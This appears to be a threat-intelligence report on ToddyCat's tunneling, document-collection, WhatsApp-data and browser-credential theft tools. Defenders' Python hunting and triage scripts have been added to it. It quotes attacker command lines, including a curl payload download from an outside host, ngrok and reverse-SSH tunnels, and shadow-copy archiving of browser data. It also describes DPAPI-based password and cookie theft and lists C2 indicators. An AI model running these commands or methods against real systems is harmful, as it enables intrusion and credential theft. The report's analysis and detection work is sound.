"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp

In this case, after installing the server in the system, the attackers changed the server settings in vpn_server.config.
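The two tunnels described so far leave characteristic residue on disk: OpenSSH private keys stored under .ini/.dat names in C:\Windows\AppReadiness, and hamcore.se2 sitting next to a renamed vpnserver_x64.exe (the server loads the container by name from its own folder, so that file keeps its name). The following hunt script is an added example for defenders, not Kaspersky's or ToddyCat's code. It builds a constructed directory tree mirroring the paths quoted above (file contents are placeholders) and checks it for both artefacts; the MD5 set is taken from the vpnserver_x64.exe hashes in this report's IoC list, and the KEY_EXTENSIONS set is an assumption about where an OpenSSH identity file normally lives.

```python
"""Hunt a file system for on-disk residue of the tunneling tools described in this report."""
import hashlib
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import List

OPENSSH_KEY_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
KEY_EXTENSIONS = {"", ".key", ".pem"}          # assumption: normal homes for an identity file
# vpnserver_x64.exe MD5s from the report's "legitimate tools" IoC list
KNOWN_VPNSERVER_MD5 = {"1f514121162865a9e664c919e71a6f62", "6f32d6cfaad3a956aacea4c5a5c4fbfe"}


@dataclass(frozen=True)
class Residue:
    path: str      # relative to the scanned root, POSIX separators
    reason: str
    md5: str


def _md5(p: Path) -> str:
    h = hashlib.md5()
    with p.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt_tunnel_residue(root: Path) -> List[Residue]:
    """Flag disguised OpenSSH keys, hamcore.se2 and every executable sitting beside it."""
    hits: List[Residue] = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        with p.open("rb") as fh:
            head = fh.read(len(OPENSSH_KEY_HEADER))
        # A private key is identified by its header, not by its (possibly disguised) extension.
        if head == OPENSSH_KEY_HEADER and p.suffix.lower() not in KEY_EXTENSIONS:
            hits.append(Residue(rel, f"OpenSSH private key disguised as {p.suffix}", _md5(p)))
        if p.name.lower() == "hamcore.se2":
            hits.append(Residue(rel, "SoftEther hamcore.se2 container", _md5(p)))
            for sib in sorted(p.parent.glob("*.exe")):   # the renamed VPN server lives next to it
                digest = _md5(sib)
                note = " (known vpnserver_x64.exe hash)" if digest in KNOWN_VPNSERVER_MD5 else ""
                hits.append(Residue(sib.relative_to(root).as_posix(),
                                    "executable beside hamcore.se2" + note, digest))
    return hits


def build_sample_tree(root: Path) -> None:
    """Constructed fixture mirroring the report's paths; contents are placeholders only."""
    (root / "Windows/AppReadiness").mkdir(parents=True)
    (root / "ProgramData/ssh").mkdir(parents=True)
    (root / "Users/bob/.ssh").mkdir(parents=True)
    key = OPENSSH_KEY_HEADER + b"\nplaceholder\n"
    (root / "Windows/AppReadiness/value.dat").write_bytes(key)        # disguised key
    (root / "Windows/AppReadiness/read.ini").write_bytes(key)         # disguised key
    (root / "Windows/AppReadiness/normal.dat").write_bytes(b"not a key")
    (root / "Users/bob/.ssh/id_ed25519").write_bytes(key)             # legitimate, no extension
    (root / "ProgramData/ssh/hamcore.se2").write_bytes(b"placeholder container")
    (root / "ProgramData/ssh/vmtools.exe").write_bytes(b"placeholder renamed server")


def demo() -> List[Residue]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return hunt_tunnel_residue(root)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit.md5}  {hit.path}  ({hit.reason})")
```

On a real host, point hunt_tunnel_residue at the system drive; the placeholder vmtools.exe in the fixture will not match the IoC hashes, but any executable found beside hamcore.se2 is worth pulling regardless, because the attackers renamed the server freely while the container name never changed.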

Data for connecting the remote client to the server and its authentication details are added to the configuration file:

AccountName | Hostname
            | ha.bbmouseme[.]com
            | 118[.]193.40.42

Ngrok agent and Krong

Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user’s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.

The agent can be started, for instance, with the following command.

"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 -- authtoken 2GskqGD<token>txB7WyV"

The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file side-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.

"cmd" /c "cd C:\windows\temp\ & SystemInformation.exe 0.0.0.0 54112"

Krong is a proxy that encrypts the data transmitted through it using the XOR function.

Code snippet for deciphering received data

This allows Krong to hide the contents of the traffic to evade detection.

FRP client

After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP client. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.

The attackers used two files to run the client:

  • Frpc.exe: an FRP client executable file
  • Frpc.toml: a client configuration file

The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.

After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.

c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini

This starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.
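Every tunneling tool in this section is started from a command line that can be collected from process-creation or scheduled-task telemetry, and each leaves a distinctive trace there: ssh.exe with -R and an identity file under a non-key extension, icacls /remove against a system folder, ngrok's ngrok.io and authtoken arguments even when the binary is renamed, curl saving a .js URL as .exe or .se2, and executables launched from the staging folders listed above. The triage routine below is an added example for defenders, not Kaspersky's code. Four sample lines are quoted from this report (addresses left defanged as printed); the icacls line is a constructed expansion of a.bat's %Key% variable as the child process would see it, and the two benign lines are constructed controls. The STAGING_DIRS and PROTECTED_DIRS tuples are assumptions drawn from the paths quoted here.

```python
"""Triage Windows command lines for the tunneling tradecraft described in this report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Finding:
    rule: str       # short rule name
    evidence: str   # fragment of the command line that fired the rule


KEY_EXTENSIONS = {"", ".key", ".pem"}                    # assumption: normal identity-file names
DROPPED_EXT = {".exe", ".dll", ".se2"}                   # payload types seen downloaded with curl
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\programdata\\")
STAGING_DIRS = ("c:\\windows\\debug\\", "c:\\perflogs\\", "c:\\users\\public\\",
                "c:\\windows\\temp\\", "c:\\intel\\")   # drop folders quoted in this report


def _ext(path: str) -> str:
    """Lower-cased extension of a Windows path or URL, '' when there is none."""
    name = path.strip('"').rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    return ("." + name.rsplit(".", 1)[1]).lower() if "." in name else ""


def triage(cmdline: str) -> List[Finding]:
    low = cmdline.lower()
    out: List[Finding] = []

    # 1. Reverse SSH tunnel: the client is asked (-R) to forward a remote port back to this host.
    m = re.search(r"\bssh(?:\.exe)?\b.*?\s-r\s+(\d+:\S+)", low)
    if m:
        out.append(Finding("reverse_ssh_tunnel", m.group(1)))
        key = re.search(r"\s-i\s+(\S+)", low)
        if key and _ext(key.group(1)) not in KEY_EXTENSIONS:
            out.append(Finding("ssh_key_disguised_extension", key.group(1)))

    # 2. Ownership grab or DACL stripping on a system folder (what a.bat does to AppReadiness).
    m = re.search(r"\b(icacls|takeown)\b\s+(?:/f\s+)?\"?([^\"\s]+)\"?", low)
    if m and m.group(2).startswith(PROTECTED_DIRS) and (m.group(1) == "takeown" or "/remove" in low):
        out.append(Finding("system_dir_acl_tamper", f"{m.group(1)} {m.group(2)}"))

    # 3. ngrok agent: the binary may be renamed, but the arguments still name ngrok.io / the authtoken.
    if re.search(r"\btcp\b", low) and ("ngrok.io" in low or "authtoken" in low):
        out.append(Finding("ngrok_tcp_tunnel", "ngrok.io / authtoken arguments"))

    # 4. curl storing a download under an executable extension that differs from the URL's.
    m = re.search(r"\bcurl\b.*?(https?://\S+)\s+-o\s+(\S+)", low)
    if m and _ext(m.group(2)) in DROPPED_EXT and _ext(m.group(1)) != _ext(m.group(2)):
        out.append(Finding("curl_masqueraded_download", f"{m.group(1)} -> {m.group(2)}"))

    # 5. Executable launched from one of the staging folders this report ties to renamed tools.
    for m in re.finditer(r"([a-z]:\\[^\s\"]+\.exe)\b", low):
        if m.group(1).startswith(STAGING_DIRS):
            out.append(Finding("exe_in_staging_dir", m.group(1)))
            break
    return out


SAMPLE_COMMANDS: Dict[str, str] = {
    # Quoted from the report (addresses defanged as printed)
    "ssh_tunnel": r"C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103[.]27.202.85 -p 22222 -fN",
    "ngrok": r'"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 -- authtoken 2GskqGD<token>txB7WyV"',
    "curl_drop": r'"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1',
    "frp_client": r"c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini",
    # Constructed: a.bat's first icacls line with %Key% expanded, as the child process sees it
    "acl_strip": r'icacls "C:\Windows\AppReadiness" /remove "BUILTIN\Administrators" > "%temp%\a.txt"',
    # Constructed benign controls: an admin's ordinary SSH session and an ordinary icacls grant
    "benign_ssh": r'"C:\Program Files\OpenSSH\ssh.exe" -p 22 admin@jumphost.example',
    "benign_icacls": r"icacls C:\Users\bob\docs /grant bob:(OI)(CI)F",
}


def triage_all(commands: Dict[str, str]) -> Dict[str, Set[str]]:
    """Map each named command line to the set of rule names it fires."""
    return {name: {f.rule for f in triage(cmd)} for name, cmd in commands.items()}


if __name__ == "__main__":
    for name, rules in triage_all(SAMPLE_COMMANDS).items():
        print(f"{name:14s} {sorted(rules) or ['-']}")
```

The FRP line carries nothing ngrok-like, so it is caught only by its staging path, and Krong's launch line (SystemInformation.exe 0.0.0.0 54112) is not distinctive at all; that tool is better caught by DLL side-loading telemetry on the signed host binary than by command-line rules.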

Data collection tools

Cuthead for data collection

Recently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated from the “file description” field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.

Cuthead tool accepts the following arguments:

fkw.exe <date> <extensions> [keywords]

  • Date: the date when the file was last modified, in yyyyMMdd format. The search looks for files modified on that date or later
  • Extensions: a string without spaces that contains file extensions separated by semicolons
  • Keywords: a string without spaces that contains semicolon-delimited words to look for in file names

Here is an example of a cuthead launch command.

"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx

In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.

Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (T1005 Data from Local System). Folders that contain the following substrings are excluded from the search.

$
Windows
Program Files
Programdata
Application Data
Program Files (x86)
Documents and Settings

Also, the files are excluded from the search if they meet the following criteria:

  • The file size is greater than 50 MB (52428800 bytes).
  • The file extensions do not match those specified in the command-line parameters.
  • The names do not contain the keywords specified in the command-line parameters.

A list of files found by the search is passed to the function that creates ZIP archives with the password “Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 0.85.4.369 is used for creating archives (T1560.002 Archive Collected Data: Archive via Library).

Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.

WAExp: WhatsApp data stealer

This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser’s local storage files.

The executable accepts the following arguments.

app.exe [check|copy|start] [remote]

  • Check: checks for the presence of data on the host.
  • Copy: copies the data it finds to the temporary folder.
  • Start: first copies the data to the temporary folder, then packs the data into an archive file.
  • Remote: the name of the remote host.

When executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are searched along “\\[remote]\C$\users\“. If it is not specified, the malware uses the environment variable %SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.

All Users
Default User
Default
Public

After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.

For Chrome, the tool opens <User>\Appdata\local\Google\ and for Edge, <User>\Appdata\local\Microsoft\Edge\. Inside these, it looks for a folder with the following name inside the subfolders.

https_web.whatsapp.com_0.indexeddb.leveldb

For Mozilla, the tool opens <User>\Appdata\roaming\ and looks for a folder with the following name inside the subfolders:

https+++web.whatsapp.com

Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example, Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.

WAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird

In the image above, you can see the output of the tool running with the “check” parameter. It shows storage files for Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.

When executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.

C:\Programdata\Microsoft\Default\

The last parameter that the tool uses is “start”. It gathers target files inside a temporary folder, as described in the copy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module (T1560.002 Archive Collected Data: Archive via Library).

It saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the following path:

C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss

After that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing web.whatsapp.com data.

The image below shows an example of WAExp output when run with the various startup parameters.

WAExp output for its various command-line parameters

The operations shown above collect Chrome data and generate an archive, whose contents are shown below.

Archive file containing data stolen by WAExp
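Both collection tools end with an archive on disk, and the two archives look different: cuthead's ZIPs are password-protected (“Unsafe404”), while WAExp writes a plain ZIP through System.IO.Compression.ZipFile under a name of the form Default-yyyyMMdd-hhmmss with no extension in C:\Programdata\Microsoft. The hunt below, an added example for defenders and not Kaspersky's code, identifies archives by their PK magic rather than their extension and reports either trait. The directory tree is a constructed fixture; the “encrypted” sample is a plain ZIP whose general-purpose flag bit 0 (the bit a password-protecting archiver sets) has been patched on, which is enough to exercise the flag-based check without any real encryption.

```python
"""Hunt for the archive artefacts cuthead and WAExp leave behind."""
import io
import re
import struct
import tempfile
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Tuple

ZIP_MAGIC = b"PK\x03\x04"
WAEXP_NAME = re.compile(r"^Default-\d{8}-\d{6}$")   # word 'Default', timestamp, no extension


@dataclass(frozen=True)
class ArchiveHit:
    path: str     # relative to the scanned root, POSIX separators
    reason: str


def zip_has_encrypted_entries(path: Path) -> bool:
    """Bit 0 of an entry's general-purpose flag marks traditional (password) encryption."""
    with zipfile.ZipFile(path) as zf:
        return any(info.flag_bits & 0x1 for info in zf.infolist())


def hunt_archives(root: Path) -> List[ArchiveHit]:
    hits: List[ArchiveHit] = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        with p.open("rb") as fh:
            if fh.read(4) != ZIP_MAGIC:          # identify by magic, not by extension
                continue
        rel = p.relative_to(root).as_posix()
        if WAEXP_NAME.match(p.name):
            hits.append(ArchiveHit(rel, "extensionless ZIP named like a WAExp archive"))
        if zip_has_encrypted_entries(p):
            hits.append(ArchiveHit(rel, "ZIP with password-protected entries"))
    return hits


def _zip_bytes(entries: Dict[str, bytes], encrypted: bool) -> bytes:
    """Constructed fixture builder: a stored ZIP, optionally with the encryption flag patched on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    if not encrypted:
        return buf.getvalue()
    out = bytearray(buf.getvalue())
    # Set bit 0 of the flag word in every local header (offset 6) and central-directory
    # entry (offset 8); entry data stays in the clear, which is all the flag check needs.
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = out.find(sig)
        while pos != -1:
            struct.pack_into("<H", out, pos + off, struct.unpack_from("<H", out, pos + off)[0] | 0x1)
            pos = out.find(sig, pos + 4)
    return bytes(out)


def build_sample_tree(root: Path) -> None:
    """Constructed fixture mirroring the report's paths; archive contents are placeholders."""
    (root / "ProgramData/Microsoft").mkdir(parents=True)
    (root / "Intel").mkdir()
    (root / "Users/alice/Documents").mkdir(parents=True)
    # WAExp-style result: plain ZIP, name 'Default-<timestamp>', no extension
    (root / "ProgramData/Microsoft/Default-20230728-131237").write_bytes(
        _zip_bytes({"Chrome/https_web.whatsapp.com_0.indexeddb.leveldb/000003.log": b"placeholder"}, False))
    # cuthead-style result: password-protected ZIP in a staging folder
    (root / "Intel/1.zip").write_bytes(_zip_bytes({"report.docx": b"placeholder"}, True))
    # Benign controls: a user's ordinary archive, and a non-ZIP file whose name merely fits the pattern
    (root / "Users/alice/Documents/photos.zip").write_bytes(_zip_bytes({"a.jpg": b"placeholder"}, False))
    (root / "ProgramData/Microsoft/Default-20230728-000000").write_text("not an archive")


def demo() -> List[Tuple[str, str]]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return [(h.path, h.reason) for h in hunt_archives(root)]


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Neither trait is proof on its own: users make password-protected archives too, so on a real host the encrypted-ZIP hit is worth raising mainly when the archive sits in a folder like C:\Intel or C:\ProgramData that no user would choose, while the Default-timestamp pattern in C:\Programdata\Microsoft is specific enough to act on directly.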

TomBerBil for stealing passwords from browsers

In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web Browsers).

There are many open-source tools available for decrypting storage data, one of these being mimikatz. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.

To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from Chrome and Edge. Both browsers use the CryptProtectData function from DPAPI (Data Protection Application Programming Interface) to encrypt data. It protects data with the current user’s password and a special encryption master key.

All TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of explorer.exe. It identifies the process users and compiles a list.

Username identification function

The image above shows an example of the function that identifies users by process ID. It sends a WMI request to the Win32_Process class to receive an object whose processID property equals the given PID. It then calls the GetOwner method, which returns the user and domain name for the process.

After this, the malware searches for the encryption key, stored in the encrypted_key field in the following browser JSON files.

%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State

It then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData function. To do this, it calls the Unprotect function from the System.Security.Cryptography.ProtectedData package, which in turn calls CryptUnprotectData from Windows DPAPI.

Calling the Unprotect function

The image above shows an example of the Unprotect function call, which receives an array of bytes obtained from the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.

If the decryption is successful, the malware searches for Login Data and \Network\Cookies files inside the following folders.

%LOCALAPPDATA%\Google\Chrome\User Data\Default
%LOCALAPPDATA%\Google\Chrome\User Data\Profile *

It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.

SELECT origin_url, username_value, password_value FROM logins
SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies

Data retrieved this way is decrypted with the master key and saved in special files.

Most versions of the malware tool log their actions. Below is an example of a log file that they generate:

[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM
[*] [5516] [explorer] [UserName]
[+] Impersonate user UserName
[+] Current user UserName
[+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
[+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
[+] Recvtoself
[+] Current user SYSTEM
[+] End 7/28/2023 1:12:52 PM
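When a TomBerBil log like the one above is recovered during an incident, the immediate question is scope: which accounts were impersonated, and whose saved passwords and session cookies were copied out, so that the right password resets and cookie invalidations can be ordered. The parser below is an added example for defenders, not Kaspersky's code. SAMPLE_LOG reproduces the log quoted above as a constructed fixture; the line prefixes and keywords it keys on (Impersonate user, Local State File, Copy ... to, Delete File, Recvtoself) are taken from that log only, so other variants of the tool may need the table extended.

```python
"""Turn a recovered TomBerBil log into an incident-scoping summary."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed fixture: the log quoted in this report.
SAMPLE_LOG = r"""
[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM
[*] [5516] [explorer] [UserName]
[+] Impersonate user UserName
[+] Current user UserName
[+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
[+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
[+] Recvtoself
[+] Current user SYSTEM
[+] End 7/28/2023 1:12:52 PM
"""

BROWSER_MARKERS = {"\\Google\\Chrome\\": "Chrome", "\\Microsoft\\Edge\\": "Edge"}
SENSITIVE_FILES = {"Login Data", "Cookies"}      # credential and session stores the tool copies out
COPY_RE = re.compile(r"\[\+\] Copy (.+?) to ([A-Za-z]:\\.+)$")


@dataclass
class HarvestSummary:
    started: Optional[str] = None
    ended: Optional[str] = None
    impersonated_users: List[str] = field(default_factory=list)
    harvested: Dict[str, Set[str]] = field(default_factory=dict)   # "user/Browser" -> files copied
    temp_copies: List[str] = field(default_factory=list)          # destinations of the copies
    deleted: int = 0                                               # temp files the tool cleaned up


def parse_tomberbil_log(text: str) -> HarvestSummary:
    s = HarvestSummary()
    user: Optional[str] = None
    browser: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+] Begin "):
            s.started = line[len("[+] Begin "):]
        elif line.startswith("[+] End "):
            s.ended = line[len("[+] End "):]
        elif line.startswith("[+] Impersonate user "):
            user = line[len("[+] Impersonate user "):]
            s.impersonated_users.append(user)
        elif line.startswith("[+] Local State File: "):
            path = line[len("[+] Local State File: "):]
            browser = next((b for marker, b in BROWSER_MARKERS.items() if marker in path), "Unknown")
        elif line.startswith("[+] Copy "):
            m = COPY_RE.match(line)
            if not m:
                continue
            src, dst = m.groups()
            s.temp_copies.append(dst)
            fname = src.rsplit("\\", 1)[-1]
            if fname in SENSITIVE_FILES:
                s.harvested.setdefault(f"{user}/{browser}", set()).add(fname)
        elif line.startswith("[+] Delete File "):
            s.deleted += 1
        elif line == "[+] Recvtoself":
            user = None   # the tool reverted to its own token (SYSTEM in the sample)
    return s


def accounts_to_reset(summary: HarvestSummary) -> List[str]:
    """Users whose saved browser passwords or session cookies were copied."""
    return sorted({key.split("/")[0] for key in summary.harvested})


if __name__ == "__main__":
    summary = parse_tomberbil_log(SAMPLE_LOG)
    print(f"run {summary.started} -> {summary.ended}, {summary.deleted} temp files wiped")
    for key, files in summary.harvested.items():
        print(f"  {key}: {sorted(files)}")
    print("reset:", accounts_to_reset(summary))
```

The temp_copies list is also the list of paths to look for in file-creation telemetry: a non-browser process writing Login Data or Cookies into C:\Windows\TEMP\tmp*.tmp and deleting it seconds later is the same sequence seen from the endpoint's side.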

One of the variants mimics Kaspersky Anti-Virus. This executable, written in .NET, is named avpui.exe (T1036.005 Masquerading: Match Legitimate Name or Location) and contains relevant metadata:

Metadata of the tool pretending to be KAV

Some versions of the tool required specific command-line parameters to start. An example can be seen below:

A TomBerBil variant started with a parameter

In several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the browser’s User Data folder from it with 7-Zip for later exfiltration.

wmic shadowcopy call create Volume='C:\'
"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\Chrome\"User Data\"

Conclusion

We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.

To protect the organization’s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.

Indicators of compromise

Files

1D2B32910B500368EF0933CDC43FDE0B  WAExp
5C2870F18E64A14A64ABF9A56F5B6E6B  WAExp
AFEA0827779025C92CAB86F685D6429A  cuthead
C7D8266C63F8AECA8D5F5BDCD433E72A  cuthead
750EF49AFB88DDD52F6B0C500BE9B717  TomBerBil
853A75364D76E9726474335BCD17E225  TomBerBil
BA3EF3D0947031FB9FFBC2401BA82D79  Krong

Legitimate tools

4A79A8B1F6978862ECFA71B55066AADD  FRP client
1F514121162865A9E664C919E71A6F62  vpnserver_x64.exe
6F32D6CFAAD3A956AACEA4C5A5C4FBFE  vpnserver_x64.exe
9DC7237AC63D552270C5CA27960168C3  ngrok.exe
34985FAE5FA8E9EBAA872DE8D0105005  ngrok.exe

C2 addresses

103.27.202[.]85 – SSH server
118.193.40[.]42 – Server from SoftEther VPN
Ha[.]bbmouseme[.]com – Server from SoftEther VPN

Links

hxxp://www.netportal.or[.]kr/common/css/main.js | vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js | Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2 | Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe | vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 | Hamcore.se2